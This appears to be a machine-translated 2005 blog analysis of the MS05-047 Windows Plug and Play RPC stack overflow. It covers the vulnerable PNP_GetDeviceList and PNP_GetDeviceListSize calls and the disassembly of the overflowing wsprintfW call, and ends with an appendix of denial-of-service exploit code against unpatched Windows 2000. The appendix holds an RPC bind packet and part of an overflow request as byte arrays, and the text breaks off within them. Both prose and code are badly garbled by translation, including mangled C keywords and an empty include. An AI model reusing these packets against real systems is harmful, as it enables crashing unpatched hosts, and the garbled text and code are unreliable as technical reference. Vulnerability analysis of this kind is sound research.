MS05-047 PNP stack over overflow brief analysis

xiaoxiao2021-03-18 239

PPWD

2005-10-20

The vulnerability is one of the 10 vulnerabilities on October 11, and later Eeye announced the more detailed details of the vulnerability. After a simple analysis, it is found that the use of the vulnerability is similar to the MS05-039. The same RPC interface is called, but the function function is different. The MS05-039 call is 54 call, and the vulnerability needs to call 10 or 11. Call. After analysis, the function interface called 10 and 11 is as follows:

Function interface number 10:

DWORD PNP_GETDEVICELIST

[in] lpctwstr pwszdeviceTypename, // device type name

[OUT] LPWSTR PWSZDEVICELIST, // All device name list of the same type

[in, out] dword & lpbuffersize, // buffer size

DWORD DWFLAG // Sign

)

This function is used to allow all types of device names in the system. All installed devices in the system are in the registry "HKEY_LOCAL_MACHINE / System / CurrentControlSet / ENUM", the PNP_GETDEVICELIST function is a name of all device names that enumerate the same type from this directory. If the DWFLAG flag is 0, you will be included in all device names. If the flag is 1, you enumerate all device names of the PWSZDeviceTypename specified type. The device name is stored in the buffer pointed to by PwszdeviceList in order, and finally ends with an empty string. The format of the device name is: DeviceTypename / DeviceName, because the PNP_GetDeviceList function needs to call the WSPrintfw function to construct the device name of this format, the target buffer used by the WSPrintfw function is the fixed-size buffer allocated in the stack, and DeviceTypename is our own Input, if the length of the input DeviceTypename is greater than the length of the target buffer, the stack is overflow.

The function call relationship is as follows:

PNP_GetDeviceList

| ___ getInstanceList

| ____wsprintfw

.Text: 76741BFA Lea Eax, [EBP NAME]

.TEXT: 76741C00 PUSH EAX

.TEXT: 76741C01 PUSH [EBP LPSUBKEY]

.Text: 76741c04 Push Offset ASS; LPCWSTR% S /% S

.Text: 76741c09 Lea Eax, [EBP STRING]

.TEXT: 76741C0F Push Eax; LPWSTR

.TEXT: 76741C10 Call DS: __ IMP__WSPRINTFW

The call interface of the 11th function is as follows:

DWORD PNP_GETDEVICELISTSIZE

[in] lpctwstr pwszdeviceTypename, // device type name

[OUT] DWORD & LPDEVICELISTSIZE, / / The length of the device name list

DWORD DWFLAG // Sign

)

The main function of this function is to obtain the size of the buffer required to enumerate all device names, and save the size in the variable LPDeviceListSize. Although I know the interface type of these two functions, I have to use this vulnerability to perform any code, I have no difficulty, I haven't found a good way, I only write a DOS code.

The difficulty of triggering the vulnerability is that the device type name provided must be the type name already existing in the registry. If there is no existence, the function WSPRINFW will not be called, and the vulnerability cannot be triggered. Although multiple "/" characters can be added to the back of the device type name, this can only cause the DOS attack, so she can't place shellcode in the device type name. The items under "HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / ENUM" do not allow casual changes, so it is more difficult to completely use it. In the appendix is a DOS code I have written, which is valid for all unpatched WIN2000, and other versions of the operating system have no test.

Here, I am particularly grateful to Dr. Funnywei gives me a lot of RPC information, as well as for my careful guidance and constant encouragement during my debugging process. He will always be an example I have learned, huh, huh.

Appendix: MS05-047 PNP DOS code

// pnpexploit2.cpp: defines the entry point for the console application.

#include

#pragma comment (LIB, "MPR")

#pragma comment (LIB, "RPCRT4")

Unsigned char szbindstring [] =

{

0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,

0xB8, 0X10, 0X00, 0X10, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,

0x40, 0x4e, 0x9f, 0x8d, 0x3d, 0xA0, 0xCE, 0x11, 0x8F, 0x69, 0x08, 0x00, 0x3e, 0x30, 0x05, 0x1b,

0x01, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0x11, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,

0x2B, 0x10, 0X48, 0X60, 0x02, 0x00, 0x00, 0x00

}

Unsigned char szrequeststring [] =

{

0x05, 0x00,

0x00, 0x03, 0x10, 0x00, 0x00, 0x00, 0x30, 0x08, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x18, 0x08,

0x00, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x44, 0xF7, 0x12, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x48, 0x00, 0x54, 0x00, 0x52, 0x00, 0x45, 0x00, 0x45, 0x00,

0x5c, 0x00, 0x52, 0x00, 0x4f, 0x00, 0x4f, 0x00, 0x54, 0x00, 0x5c, 0x00, 0x5c, 0x00, 0x5c, 0x00,